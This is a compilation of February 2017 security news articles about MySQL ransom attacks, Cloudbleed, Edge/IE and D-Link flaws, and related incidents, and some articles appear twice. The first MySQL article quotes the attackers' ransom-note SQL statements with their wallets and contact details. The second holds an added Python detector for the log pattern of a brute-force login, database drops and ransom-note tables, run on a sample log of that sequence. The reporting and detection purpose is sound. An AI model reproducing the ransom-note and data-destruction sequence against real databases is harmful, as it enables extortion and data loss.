A wave of ransom attacks is targeting MySQL Databases worldwide
25.2.2017 securityaffairs Virus

A wave of ransom attacks is threatening thousands of MySQL databases that are exposed online: the hackers are brute forcing poorly secured MySQL servers.
Databases exposed online with poor security continue to be a favourite target of hackers.

Early this year, experts warned of a spike in the number of attacks against MongoDB systems, in which crooks requested the payment of a ransom in order to return the data and help the company fix the flaw they exploited. The attacks were discovered by the co-founder of the GDI Foundation, Victor Gevers, who warned of the poor security of MongoDB installations in the wild.

Similar attacks are now threatening thousands of MySQL databases that are exposed online: the hackers are brute forcing poorly secured MySQL servers.

The attackers enumerate the existing databases and their tables, steal their content, and create a new table that contains the instruction to pay a 0.2 Bitcoin (around $200) ransom.

The attacks targeted SQL databases all around the world.

What happens when victims pay the ransom?

In some cases, crooks provided owners with access to their data, but there is no certainty: some archives were permanently deleted without being dumped first.

Unfortunately, it is quite easy to find MySQL databases online and attempt to guess their passwords with brute force attacks.

The experts at the security firm GuardiCore observed hundreds of attacks during a 30-hour window starting at midnight on February 12.

The attacks were all launched from the same IP address (109.236.88.20), likely a compromised mail server, hosted by worldstream.nl. The researchers reported the attacks to the Netherlands-based web hosting company.

“The attacks started at midnight at 00:15 on February 12 and lasted about 30 hours in which hundreds of attacks were reported by GGSN. We were able to trace all the attacks to 109.236.88.20, an IP address hosted by worldstream.nl, a Netherlands-based web hosting company. ” reads the analysis shared by Guardicore. “The attack starts with ‘root’ password brute-forcing. Once logged-in, it fetches a list of the existing MySQL databases and their tables and creates a new table called ‘WARNING’ that includes a contact email address, a bitcoin address and a payment demand.”


The experts observed two versions of the ransom message:

INSERT INTO PLEASE_READ.`WARNING`(id, warning, Bitcoin_Address, Email) VALUES('1','Send 0.2 BTC to this address and contact this email with your ip or db_name of your server to recover your database! Your DB is Backed up to our servers!', '1ET9NHZEXXQ34qSP46vKg8mrWgT89cfZoY', 'backupservice@mail2tor.com')

and

INSERT INTO `WARNING`(id, warning)
VALUES(1, 'SEND 0.2 BTC TO THIS ADDRESS 1Kg9nGFdAoZWmrn1qPMZstam3CXLgcxPA9 AND GO TO THIS SITE http://sognd75g4isasu2v.onion/ TO RECOVER YOUR DATABASE! SQL DUMP WILL BE AVAILABLE AFTER PAYMENT! To access this site you have use the tor browser https://www.torproject.org/projects/torbrowser.html.en')

The researchers analyzed the transactions associated with the Bitcoin wallets used in the attacks:

1Kg9nGFdAoZWmrn1qPMZstam3CXLgcxPA9

1ET9NHZEXXQ34qSP46vKg8mrWgT89cfZoY


The experts highlight the importance of securing MySQL servers exposed online by using strong passwords and enforcing mandatory authentication.

Administrators should periodically back up their data and continuously monitor access to their MySQL databases in order to prevent serious damage.

“Every MySQL server facing the internet is prone to this attack, so ensure your servers are hardened. Also, make sure your servers require authentication and that strong passwords are in use. Minimizing internet facing services, particularly those containing sensitive information is also a good practice. Monitoring your internet accessible machines/services is crucial to being able to rapidly respond to any breach.” GuardiCore also notes.


Google Does It Again: Discloses Unpatched Microsoft Edge and IE Vulnerability
25.2.2017 thehackernews Vulnerability

This month has been quite an interesting one for cyber security researchers, with Google successfully cracking SHA1 and the discovery of the Cloudbleed bug in Cloudflare, which caused the leakage of sensitive information across sites hosted behind Cloudflare.
Besides this, Google last week disclosed an unpatched vulnerability in Windows Graphics Device Interface (GDI) library, which affects Microsoft's Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10.
While that Windows vulnerability has yet to be patched by the company, Google today released the details of another unpatched security flaw, this time in Microsoft's browsers, as Microsoft did not act within Google's 90-day disclosure deadline.
The vulnerability (CVE-2017-0037), discovered and disclosed by Google Project Zero team's researcher Ivan Fratric, is a so-called "type confusion flaw" in a module in Microsoft Edge and Internet Explorer that potentially leads to arbitrary code execution.
Proof-of-Concept Code Released!
This time, with the details of this arbitrary code execution bug, the researcher has also published a proof-of-concept exploit that can crash Edge and IE, opening the door for potential hackers to execute code and gain administrator privileges on the affected systems.
Fratric says he successfully ran his PoC code on the 64-bit version of IE on Windows Server 2012 R2, but both 32-bit IE 11 and Microsoft Edge are affected by the same vulnerability.
In short, the vulnerability affects all Windows 7, Windows 8.1, and Windows 10 users.
More details about the recently disclosed flaw are available in Google's bug report, along with the proof-of-concept code that causes the browsers to crash, though sophisticated hackers can build more dangerous exploits as well.
This vulnerability was reported to Microsoft on November 25, and it went public on February 25, after Google Project Zero's 90-day disclosure policy.
Three Unpatched, but Already Disclosed Windows Flaws
While Microsoft has delayed this month's Patch Tuesday and already has to patch two previously disclosed but unpatched vulnerabilities, it is hard to say whether the company will include a patch for this vulnerability discovered by Google in its next roll out of patches.
Yes, Microsoft has to patch two other severe security flaws as well, which have already been publicly disclosed with working exploit code but still remain unpatched, giving hackers enough time to target Windows users.
The first one is a Windows SMB flaw that affects Windows 8, Windows 10 and Windows Server. The PoC exploit code for this flaw was released almost two weeks ago.
The other one is the vulnerability disclosed by Google last week that affects Microsoft's Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10.
Meanwhile, just to stay on the safe side, Windows users are advised to replace their Internet Explorer and Edge browsers with a different one if possible and to avoid clicking on suspicious links and websites they do not trust.


Carder forum claims 150 million logins for sale from CloudBleed case
25.2.2017 securityaffairs Crime

The carder forum CVV2Finder claims to have more than 150 million logins, from several popular services, including Netflix and Uber. The operators in the forum are offering the precious commodity to the VIP members.

According to the experts, the data were obtained by exploiting the recently discovered Cloudbleed, a flaw that was causing the leak of a wide range of sensitive information in the CloudFlare infrastructure, including authentication cookies and login credentials of numerous organizations using the popular service.

The Cloudbleed security issue with Cloudflare servers has a significant impact on numerous major organizations, including Uber, Fitbit, 1Password, and OKCupid. Cloudbleed also affects mobile apps, because they are developed using the same backends as browsers for content delivery and HTTPS (SSL/TLS) termination.

The flaw was discovered by the popular researcher Tavis Ormandy from Google Project Zero Team.

The Canadian researcher Phineas (@itsphin) published on GitHub a list of more than 4 million domains possibly affected by Cloudflare’s Cloudbleed HTTPS Traffic Leak.

The list includes popular services such as 23andme, Coinbase, Patreon, Yelp, Fiverr, and Change.org.

“This list contains all domains that use Cloudflare DNS, not just the Cloudflare proxy (the affected service that leaked data). It’s a broad sweeping list that includes everything. Just because a domain is on the list does not mean the site is compromised, and sites may be compromised that do not appear on this list.” explained Phineas.
“Cloudflare has not provided an official list of affected domains, and likely will not due to privacy concerns. I’m compiling an unofficial list here so you know what passwords to change.”

Phineas (@itsphin) tweeted on 25 Feb 2017: “If you’d like to quickly search through the Cloudflare directory; https://github.com/Phineas/cloudbleed-search” (Phineas/cloudbleed-search: search through Cloudflare domains in pirate/sites-using-cloudflare, github.com).

Experts at Salted Hash received via email the following screenshot of the CVV2Finder carder forum.


A message that appeared on the CVV2Finder forum clearly refers to the Cloudbleed case as the source of millions of fresh credentials for popular services.

“Dear DeepWeb Users of cvv2finder, After the success of the latest attack (cloudbleed) to cloudflare servers, More than 150 Million Fresh Logins Avaliable for Uber , Netflix … and many more. After hours these data will be avaliable into a database and would sell it for 250k$. This offer only for VIP users.”

This would mean that the impact of Cloudbleed was much larger than first thought, with serious consequences for Cloudflare customers.

Experts noticed that Netflix isn’t a Cloudflare customer, so its presence in the list of accounts offered for sale is suspicious.

“CVV2Finder lists Netflix, Dominos, several “People Meet” dating websites, Tidal, CBS, Bitdefender, Origin, Dell, UPS, HBO Now, Spotify, and DirecTV accounts in their database as available to purchase.” reported Salted Hash. “However, there are only 2,300 accounts, a far cry from the 150 million they are promising.”


Apple internal development servers compromised by a malware
25.2.2017 securityaffairs Apple

Apple’s design lab internal development servers were infected by malware, so the company ended its relationship with its server supplier Supermicro.
It was mid-2016 when Apple’s design lab internal development servers were infected by malware masquerading as a firmware patch.

In response to the security incident, Apple purged its data centers of servers built by Supermicro, including returning recently purchased systems.

“In early 2016, Apple discovered what it believed was a potential security vulnerability in at least one data center server it purchased from a U.S.-based manufacturer, Super Micro Computer, according to a Super Micro executive and two people who were briefed about the incident at Apple.” reported the theinformation.com. “The server was part of Apple’s technical infrastructure, which powers its web-based services and holds customer data.”

A source familiar with the case at Apple told Ars that the malicious firmware was downloaded directly from Supermicro’s support site, and the malicious code is still hosted there.

Apple denied the security breach, but the senior vice-president of technology at Supermicro, Tau Leng, told The Information that Apple had ended its relationship with Supermicro because of the infection in the App Store development environment. Leng also confirmed that Apple returned the systems it had recently purchased.

Cloud giants are gradually migrating to custom hardware designed by system integrators in order to cut data center costs.


According to Leng, Apple was the only company infected by the fake firmware, which suggests that the root cause of the security breach was not in Supermicro’s servers. He asserted that when his company asked Apple’s engineers for information about the firmware, they gave an incorrect version number and then refused to provide further details.

An Apple spokesperson contacted by Ars called the story “completely inaccurate.”

Let’s wait for Apple’s version.


MySQL Databases Targeted in New Ransom Attacks

25.2.2017 securityweek Virus

Thousands of MySQL databases are potential victims of a ransom attack that appears to be an evolution of the MongoDB ransack campaign observed a couple of months ago, GuardiCore warns.

As part of the attack, unknown actors brute force poorly secured MySQL servers, enumerate the existing databases and their tables, steal them, and create a new table instructing owners to pay a 0.2 Bitcoin (around $200) ransom. Paying, the attackers claim, would provide owners with access to their data, but that’s not entirely true, as some databases are deleted without being stolen.

A similar attack came to light in early January, when Victor Gevers, co-founder of GDI Foundation, revealed that thousands of unsecured MongoDB databases were being hijacked, with actors demanding 0.2 Bitcoin for the stolen data. Soon after, other threat actors began hijacking insecure databases, and over 30,000 MongoDB instances fell to the attackers.

With an estimated 35,000 instances exposed to the public Internet, Elasticsearch clusters became targets as well, only to be followed by Hadoop and CouchDB databases within days. Attackers were observed overwriting each other’s ransom notes on the targeted databases, and were no longer copying the original data, but simply deleting it. Victims couldn’t retrieve their data even if they paid the ransom.

Now, MySQL databases are under fire: using online tools, actors search for servers secured with very weak passwords, brute force them to gain access, then replace the databases with their own table containing a ransom note. In some instances, they simply delete the databases without dumping them first, leaving victims with no means to recover the data.

According to the security firm, hundreds of attacks were observed during a 30-hour window starting at midnight on February 12. All attacks were traced to the same IP (109.236.88.20) and were hosted by worldstream.nl, a Netherlands-based web hosting company, which was notified of the issue a couple of days later. The researchers believe the attackers were using a compromised mail server that also serves as an HTTP(S) and FTP server.

Responding to an email inquiry, Ofri Ziv, Research Leader at GuardiCore, told SecurityWeek that the attacks were spread all around the world and didn’t appear to be targeting specific databases. He couldn’t provide an exact estimation of affected databases, but said “we do know of thousands of MySQL servers facing the Internet with weak passwords that are prone to attacks.”

The attacks are strikingly similar to the MongoDB ones, starting with the fact that the attackers are dropping ransom notes named WARNING and PLEASE_READ. However, Ziv says there’s no way to tell for sure whether the same attackers have now switched to MySQL servers. “But even if it’s not the case, they were definitely inspired by them,” he told SecurityWeek.

The Bitcoin addresses in the ransom notes show signs of activity, but GuardiCore says that isn’t proof that victims actually paid the ransom. The transactions might have been staged by the actors themselves, in an attempt to encourage victims to pay the ransom.

“Before paying the ransom we strongly encourage you to verify that the attacker actually holds your data and that it can be restored. In the attacks we monitored we couldn’t find evidence of any dump operation or data exfiltration,” GuardiCore notes in a blog post.

The security firm notes that every MySQL server facing the Internet is prone to this attack, and advises administrators to ensure their instances are properly secured using strong passwords and mandatory authentication. Further, admins should minimize Internet-facing services, especially those containing sensitive information.

“Monitoring your internet accessible machines/services is crucial to being able to rapidly respond to any breach. This way your security team could easily alert on new services being accessed from the internet and enforce a policy which fits those servers (e.g. firewall, data restrictions, etc.). Periodic data backup could allow you to restore most of your valuable data without the need to interact with the attacker and provide you with a backup plan should a similar attack occur,” GuardiCore also notes.
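The monitoring GuardiCore recommends can be automated against the MySQL general query log, looking for the sequence that both MySQL articles above describe: a burst of failed root logins from one host, a successful login from the same host, databases being dropped, and the WARNING/PLEASE_READ ransom-note objects being created. The following detector is an added example, not GuardiCore's code or anything from the articles; it assumes the MySQL 5.7 general-log layout `<timestamp> <thread id> <command> <argument>`, threshold values chosen here, and a constructed log sample.

```python
"""Flag the MySQL ransom-attack pattern in general-query-log lines (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Object names used by the ransom notes quoted in the articles.
RANSOM_OBJECTS = {"WARNING", "PLEASE_READ"}
# Assumed thresholds (not from the page): N denied logins from one host inside the window.
BRUTE_FORCE_THRESHOLD = 5
BRUTE_FORCE_WINDOW = timedelta(minutes=1)

# Assumed general-log layout: "<timestamp> <thread id> <command> <argument>".
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")
DENIED_RE = re.compile(r"Access denied for user '(?P<user>[^']+)'@'(?P<host>[^']+)'")
CONNECT_RE = re.compile(r"^(?P<user>\w+)@(?P<host>[\w.:-]+)")
# Matches the statements the attack uses and captures "db" / "db.table" names,
# including the backquoted form seen in the ransom note: PLEASE_READ.`WARNING`.
STMT_RE = re.compile(
    r"^(?P<verb>CREATE\s+(?:DATABASE|TABLE)|INSERT\s+INTO|DROP\s+(?:DATABASE|TABLE))\s+"
    r"(?:IF\s+(?:NOT\s+)?EXISTS\s+)?"
    r"`?(?P<first>\w+)`?(?:\.`?(?P<second>\w+)`?)?",
    re.IGNORECASE,
)


def parse_line(line):
    """Split one log line into (timestamp, thread id, command, argument), or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%fZ")
    return ts, m["tid"], m["cmd"], m["arg"]


def analyse(lines):
    """Return findings: brute-force bursts, ransom-note objects and database/table drops."""
    failures = defaultdict(list)   # source host -> timestamps of denied logins
    brute_forced = set()           # hosts that crossed the threshold
    session_host = {}              # thread id -> source host of a successful connect
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, tid, cmd, arg = parsed
        if cmd == "Connect":
            denied = DENIED_RE.search(arg)
            if denied:
                host = denied["host"]
                # Keep only failures inside the sliding window, then count them.
                failures[host] = [t for t in failures[host] if ts - t <= BRUTE_FORCE_WINDOW] + [ts]
                if len(failures[host]) >= BRUTE_FORCE_THRESHOLD and host not in brute_forced:
                    brute_forced.add(host)
                    findings.append({"type": "brute_force", "host": host, "user": denied["user"],
                                     "failures": len(failures[host]), "at": ts})
            else:
                connect = CONNECT_RE.match(arg)
                if connect:
                    session_host[tid] = connect["host"]
        elif cmd == "Query":
            stmt = STMT_RE.match(arg)
            if not stmt:
                continue
            host = session_host.get(tid, "unknown")
            names = [n for n in (stmt["first"], stmt["second"]) if n]
            common = {"host": host, "object": ".".join(names),
                      "brute_forced": host in brute_forced, "at": ts}
            if stmt["verb"].upper().startswith("DROP"):
                # The attacks deleted databases, sometimes without dumping them first.
                findings.append({"type": "data_destruction", **common})
            elif any(n.upper() in RANSOM_OBJECTS for n in names):
                findings.append({"type": "ransom_note", **common})
    return findings


# Constructed sample (TEST-NET address, placeholder wallet and e-mail), not a real capture.
SAMPLE_LOG = """\
2017-02-12T00:15:01.000000Z    10 Connect   Access denied for user 'root'@'203.0.113.45' (using password: YES)
2017-02-12T00:15:02.000000Z    11 Connect   Access denied for user 'root'@'203.0.113.45' (using password: YES)
2017-02-12T00:15:03.000000Z    12 Connect   Access denied for user 'root'@'203.0.113.45' (using password: YES)
2017-02-12T00:15:04.000000Z    13 Connect   Access denied for user 'root'@'203.0.113.45' (using password: YES)
2017-02-12T00:15:05.000000Z    14 Connect   Access denied for user 'root'@'203.0.113.45' (using password: YES)
2017-02-12T00:15:06.000000Z    15 Connect   root@203.0.113.45 on  using TCP/IP
2017-02-12T00:15:06.000000Z    15 Query     SHOW DATABASES
2017-02-12T00:15:07.000000Z    15 Query     DROP DATABASE customers
2017-02-12T00:15:07.000000Z    15 Query     CREATE DATABASE PLEASE_READ
2017-02-12T00:15:08.000000Z    15 Query     CREATE TABLE PLEASE_READ.`WARNING` (id INT, warning TEXT, Bitcoin_Address TEXT, Email TEXT)
2017-02-12T00:15:08.000000Z    15 Query     INSERT INTO PLEASE_READ.`WARNING`(id, warning, Bitcoin_Address, Email) VALUES(1, 'Send 0.2 BTC to this address ...', '<bitcoin-address>', '<contact-email>')
2017-02-12T00:15:09.000000Z    16 Connect   app@10.0.0.7 on  using TCP/IP
2017-02-12T00:15:09.000000Z    16 Query     SELECT id FROM customers.orders LIMIT 1
"""

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG.splitlines()):
        print(f["at"].isoformat(), f["type"], f["host"], f.get("object", f.get("user")),
              "(after brute force)" if f.get("brute_forced") else "")
```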


D-Link Patches Serious Flaws in DGS-1510 Switches

25.2.2017 securityweek Vulnerability
D-Link has released firmware updates for the company’s DGS-1510 stackable managed switches to address serious vulnerabilities that can be exploited remotely to hijack the devices.

Security researchers Aditya K Sood and Varang Amin discovered that the D-Link DGS-1510 switches, which are recommended for small and medium-sized enterprises, have an insecure authentication design.

According to the experts, a remote attacker can exploit the authentication bypass vulnerabilities to execute commands on the switch, and extract configuration and other data.

A proof-of-concept (PoC) shared by the researchers with SecurityWeek shows how an unauthenticated attacker can harvest user information from a device, including username and password, and add a new user with administrator privileges. The PoC will be made publicly available at a later date.

Sood and Amin said they identified dozens of systems on the Internet, but they did not attempt to determine exactly how many devices can be exploited remotely from the Web.

In its own advisory, D-Link described the vulnerabilities as unauthenticated command bypass and unauthenticated information disclosure issues. The flaws affect DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, DGS-1510-28P, DGS-1510-28 and DGS-1510-20 models running any firmware version prior to 1.31.B003.

The firmware update that addresses the security holes is currently in beta and it will be made generally available once it passes long-term quality assurance testing, D-Link said.

The problems were reported to D-Link in January and the patch, tested by the researchers, was released on February 21.

Serious vulnerabilities were found in many D-Link products last year, including cameras, access points, modems, routers, storage solutions and connected home products.

In early January, the U.S. Federal Trade Commission (FTC) filed a lawsuit against the Taiwan-based networking equipment provider, accusing the company of making deceptive claims about the security of its products. D-Link is determined to fight the “unwarranted and baseless” charges.


Briton Arrested Over Deutsche Telekom Hacking

25.2.2017 securityweek Hacking
A British national has been arrested at a London airport on suspicion of staging a cyber attack on Deutsche Telekom last year that knocked around a million German households offline, officials in both countries said Thursday.

The 29-year-old, who was subject to a European arrest warrant, was detained on Wednesday by officers from Britain's National Crime Agency (NCA), German federal police and prosecutors said in a statement.

"The Briton stands accused of attempted computer sabotage in a particularly serious case," they said.

Around a million of Deutsche Telekom's 20 million customers were unable to connect to its network in late November, with the company saying a hacking attack targeting household routers was to blame for the hours-long disruptions.

An NCA spokesperson said the arrest took place at London's Luton airport at the request of German police but that the suspect was also wanted "in connection to separate offences committed in the UK".

German federal prosecutors said they were now seeking the suspect's extradition from Britain.

If found guilty, he faces up to 10 years' jail in Germany.

Cyber fears

In their statement, German police said the goal of the Deutsche Telekom assault was to infect users' computers with a "botnet" operated by the accused -- a network of web-connected machines that can be manipulated with malware.

The suspect allegedly offered the botnet for sale on the deep web, the statement added.

Deutsche Telekom was able to fend off the attack by advising customers to disconnect their routers and restart them after a software update.

The large-scale strike fuelled concerns over cyber security in Germany and officials have warned that more online assaults are possible ahead of a general election in September.

The country has already been the victim of repeated hacking attacks in recent years.

Last September, several political parties were targeted with fake emails purporting to be from NATO headquarters but which in fact contained a link that installed spying software on victims' computers.

In 2015, hackers targeted Germany's lower house parliament in an attack that security services have since blamed on Russia.

Germany has also anxiously eyed the impact of leaked documents obtained by hackers during last year's US presidential campaign.

Chancellor Angela Merkel said late last year that cyber attacks from Russia were now so common that Germany must learn to cope with them as "part of daily life".


Gmail accounts lock out their users. Glitch or hack, it’s a mystery
25.2.2017 securityaffairs IT 

A huge number of Gmail accounts locked out their users and forced them to log in again. What has happened? Is it the result of a massive cyber attack?
The strange behavior has led experts to believe that something has happened. Is it a computer glitch or a hack?


Rumors of a cyber attack are circulating online, on Reddit many users shared a description of their strange experience. Gmail users are receiving messages informing them that their account has been changed, and asking them to re-sign into Gmail accounts on their mobile.

In response to a thread on one of its official forums, Google confirmed that an investigation is ongoing, but at the same time downplayed concerns, stating that there is no indication the accounts have been hacked.

“We’ve gotten reports about some users being signed out of their accounts, unexpectedly. We’re investigating, but not to worry: there is no indication that this is connected to any phishing or account security threats. Please try to sign-in again at accounts.google.com and if you cannot remember your password, please use this link (g.co/recover) to recover your password.” reads the Google’s response.

Google (@Google) tweeted on 24 Feb 2017: “We know some of you had issues signing in today. Please try again now. Rest easy -- your account's security was not affected.”

Hackread.com cited Crystal Cee from Google’s Product Forum, confirming that Google users need to sign in again to access their accounts using this address “accounts.google.com.”

Cee explained that if users have forgotten the password then they have to use this link “g.co/Recover” to recover it. Cee also added that users with 2-step verification can experience a delay in SMS code reception.

We can only wait for further information shared by the IT giant.


Cyberattacks in the service of politics

25.2.2017 SecurityWorld BigBrother
When former president Václav Klaus presented an anti-refugee appeal at the beginning of last September, its website quickly became the target of attacks. Within the first hour the operators recorded at least twenty attempts to modify the pages, which clearly demonstrates one thing: politics is also conducted on the internet, and by every available means.

Using cyberspace to push opinions “by force” is not a new phenomenon. In the Czech lands, however, it has so far been rather exceptional, which represented something of a local anomaly.

But as recent events show, we are quickly catching up with the world. Let’s not get ahead of ourselves, though.

Probably the first case of cyberspace being abused for political pressure occurred in October 1989 and took the form of the WANK worm (Worm Against Nuclear Killers). It was part of a broader anti-nuclear campaign (somewhat absurdly, it railed against nuclear weapons but “protested” against the launch of the Galileo interplanetary probe, which carried a nuclear battery).

Otherwise it was the second largest worm attack in the history of the internet, if the yardstick is the overall percentage of infected computers (the largest was the legendary Morris Worm of November 1988).

In the first half of the 1990s dozens of computer viruses appeared which, on specific days or on certain occasions, displayed a demand to stop French nuclear tests in the Pacific. Many of them reached the Czech Republic as well: cyber politics thus probably arrived in our computers for the first time.

Music as a pretext

In October 1994 the activist group Zippies created an e-mail bomb and carried out several DDoS attacks against the British government, and in particular against Prime Minister John Major.

He was pushing a law (the Criminal Justice and Public Order Act) containing a controversial passage banning loud outdoor music with “a succession of repetitive beats”.

The attack went down in history as the “Intervasion of the UK”, and some websites were out of service for more than a week because of it. It was probably the first use of a DDoS attack for political pressure. The law ultimately did not pass, and the cyber community gradually began to realise its strength and possibilities.

In July 2001 the international group Hacktivismo called for civil disobedience in cyberspace. It even issued a “Hacktivist Declaration”, which it claimed was as significant as the UN’s Universal Declaration of Human Rights.

According to it, a person on the internet should have a guaranteed “right to opinion and expression”, and the right to develop and own technologies against “state-sponsored censorship of the internet” should likewise be guaranteed.

The idea, attractive at first glance, ran into several pitfalls. For one thing, binding free-thinking activities on the internet into some form of convention is not so simple. For another, its critics pointed to the contradiction whereby the declaration was to guarantee freedom of expression to one side by denying it to the other.

April 2007 and the now legendary relocation of the Red Army soldier statue from the centre of the Estonian capital Tallinn brought a major political affair. The “protest”, demonstrably originating from neighbouring Russia, hit practically the entire internet infrastructure in Estonia.

Government computers collapsed, the stock exchange did not work, and in a country traditionally built on cyber technologies it was practically impossible to get anything done.

The pro-Kremlin group “Nashi” claimed responsibility for the attack while denying that it had received direct orders from higher up to carry it out. Even if that were true, it is evident that Russia took no action whatsoever against the attackers (who were demonstrably breaking its laws as well).

And what about the present?

Let us now move forward several years to the present. Analysts have for several years been predicting a dramatic rise in political cyber warfare in our country, and it seems they have finally got their wish.

In Slovakia, for example, the websites of political parties were already falling like ninepins in the 2012 election year, and there was no shortage of disinformation and fake profiles.

The biggest Czech affair thus remained the dizzyingly rapid gain of 5,000 “likes” by the Party of Civic Rights over a single weekend in September 2013. Most of the new admirers were from South-East Asia. (For completeness: the typical rate is CZK 200 for 150 to 250 likes.)

After last year’s anti-refugee appeal mentioned at the beginning of this article, in December 2015 someone hacked the Twitter account of Prime Minister Bohuslav Sobotka. And in January of this year the White Media website published parts of his e-mail correspondence in several waves.

There was nothing fundamentally compromising in it (apart from one document classified “Restricted”, which in the Czech Republic is the lowest classification level, denoting a document whose unauthorised handling could be disadvantageous to the republic), but using a private e-mail account for work purposes (in such a critical position) is of course not in keeping with the principles of secure communication.

In May attackers then hit the websites of the Senate, the police and the ČSSD, and reportedly also targeted the fire service and the Ministry of the Interior. They were reacting to the gambling regulation law, which according to many sets a dangerous precedent in restricting freedom on the internet.

And if we look at the wider world again, one of the main “skeletons in the closet” that keep being dragged out against US presidential candidate Hillary Clinton is the unauthorised use of a private mail server for work communication.

Granted, this is not a cyberattack as such, but rather a question of personal discipline. In any case the matter has not been fully investigated and we will undoubtedly hear more about it. Either way, it shows that ICT security is carrying ever more weight in politics as well.


CloudFlare Leaked Sensitive Customer Data

24.2.2017 securityweek Crime

CloudFlare has been working around the clock in the past few days to address a critical security problem that led to sensitive customer data getting leaked and cached by search engines.

The uninitialized memory leak was discovered by Google Project Zero researcher Tavis Ormandy, who jokingly said he considered the idea of calling it “Cloudbleed” due to similarities to the OpenSSL bug known as HeartBleed.

Ormandy noticed the leakage on February 17, while working on a fuzzing-related project. He immediately notified CloudFlare and the CDN had an initial mitigation in place within an hour. However, the cleanup effort took several days since Google, Yahoo, Bing and other search engines had cached at least 770 URIs across 161 unique domains containing leaked memory.

According to the expert, the leaked data included passwords, cookies, encryption keys, private messages from dating sites, chat messages, IP addresses and even HTTPS requests.

Researcher Nick Sweeting has compiled a list of potentially affected domains, including major services such as Coinbase, DigitalOcean, Medium, 4Chan, Yelp, Uber, Zendesk, OKCupid and Namecheap. Ormandy also named 1Password, but the password manager reassured users that their data was not at risk.

NowSecure has published a blog post detailing how the Cloudbleed bug impacts mobile applications.

In a blog post describing the incident, Cloudflare CTO John Graham-Cumming explained that the company’s edge servers were running past the end of a buffer and returning memory that contained sensitive information.

CloudFlare said memory leakage may have first occurred in September 2016, when the company enabled automatic HTTP rewrites. Then it got worse after a couple of features, server-side excludes and email obfuscation, were migrated to new parsers this year. The content delivery network has determined that the period with the greatest impact was February 13-18, when one in every 3.3 million HTTP requests going through CloudFlare may have resulted in memory leakage.

Graham-Cumming pointed out that customers’ SSL private keys were not leaked, but admitted that a private key used to encrypt connections between the company’s own machines was compromised.

CloudFlare said there was no evidence of any malicious exploits or information being leaked on Pastebin or other such websites. Google Project Zero said it destroyed the data samples collected during its analysis.

Ormandy was ultimately satisfied with how CloudFlare handled the issues and its detailed incident report. However, the expert believes the CDN’s blog “severely downplays the risk to customers.”

In an email to customers, Matthew Prince, Cloudflare Co-founder and CEO, said the company would notify customers if they discovered any data leaked about their domains during the search, and that they would provide full details on what was found.

"To date, we have yet to find any instance of the bug being exploited, but we recommend if you are concerned that you invalidate and reissue any persistent secrets, such as long lived session identifiers, tokens or keys," Prince wrote. "Due to the nature of the bug, customer SSL keys were not exposed and do not need to be rotated."


D-Link Patches Serious Flaws in DGS-1510 Switches

24.2.2017 securityweek Vulnerebility
D-Link has released firmware updates for the company’s DGS-1510 stackable managed switches to address serious vulnerabilities that can be exploited remotely to hijack the devices.

Security researchers Aditya K Sood and Varang Amin discovered that the D-Link DGS-1510 switches, which are recommended for small and medium-sized enterprises, have an insecure authentication design.

According to the experts, a remote attacker can exploit the authentication bypass vulnerabilities to execute commands on the switch, and extract configuration and other data.

A proof-of-concept (PoC) shared by the researchers with SecurityWeek shows how an unauthenticated attacker can harvest user information from a device, including username and password, and add a new user with administrator privileges. The PoC will be made publicly available at a later date.

Sood and Amin said they identified dozens of systems on the Internet, but they did not attempt to determine exactly how many devices can be exploited remotely from the Web.

In its own advisory, D-Link described the vulnerabilities as unauthenticated command bypass and unauthenticated information disclosure issues. The flaws affect DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, DGS-1510-28P, DGS-1510-28 and DGS-1510-20 models running any firmware version prior to 1.31.B003.

The firmware update that addresses the security holes is currently in beta and it will be made generally available once it passes long-term quality assurance testing, D-Link said.

The problems were reported to D-Link in January and the patch, tested by the researchers, was released on February 21.

Serious vulnerabilities were found in many D-Link products last year, including cameras, access points, modems, routers, storage solutions and connected home products.

In early January, the U.S. Federal Trade Commission (FTC) filed a lawsuit against the Taiwan-based networking equipment provider, accusing the company of making deceptive claims about the security of its products. D-Link is determined to fight the “unwarranted and baseless” charges.


Briton Arrested Over Deutsche Telekom Hacking

24.2.2017 securityweek Hacking
A British national has been arrested at a London airport on suspicion of staging a cyber attack on Deutsche Telekom last year that knocked around a million German households offline, officials in both countries said Thursday.

The 29-year-old, who was subject to a European arrest warrant, was detained on Wednesday by officers from Britain's National Crime Agency (NCA), German federal police and prosecutors said in a statement.

"The Briton stands accused of attempted computer sabotage in a particularly serious case," they said.

Around a million of Deutsche Telekom's 20 million customers were unable to connect to its network in late November, with the company saying a hacking attack targeting household routers was to blame for the hours-long disruptions.

An NCA spokesperson said the arrest took place at London's Luton airport at the request of German police but that the suspect was also wanted "in connection to separate offences committed in the UK".

German federal prosecutors said they were now seeking the suspect's extradition from Britain.

If found guilty, he faces up to 10 years' jail in Germany.

Cyber fears

In their statement, German police said the goal of the Deutsche Telekom assault was to infect users' computers with a "botnet" operated by the accused -- a network of web-connected machines that can be manipulated with malware.

The suspect allegedly offered the botnet for sale on the deep web, the statement added.

Deutsche Telekom was able to fend off the attack by advising customers to disconnect their routers and restart them after a software update.

The large-scale strike fuelled concerns over cyber security in Germany and officials have warned that more online assaults are possible ahead of a general election in September.

The country has already been the victim of repeated hacking attacks in recent years.

Last September, several political parties were targeted with fake emails purporting to be from NATO headquarters but which in fact contained a link that installed spying software on victims' computers.

In 2015, hackers targeted Germany's lower house parliament in an attack that security services have since blamed on Russia.

Germany has also anxiously eyed the impact of leaked documents obtained by hackers during last year's US presidential campaign.

Chancellor Angela Merkel said late last year that cyber attacks from Russia were now so common that Germany must learn to cope with them as "part of daily life".


U.S. Oil and Gas Industry Lagging in Security: Report

24.2.2017 securityweek Security
The oil and gas industry in the United States is largely unprepared to address cybersecurity risks in operational technology (OT) environments, according to a study commissioned by German engineering giant Siemens.

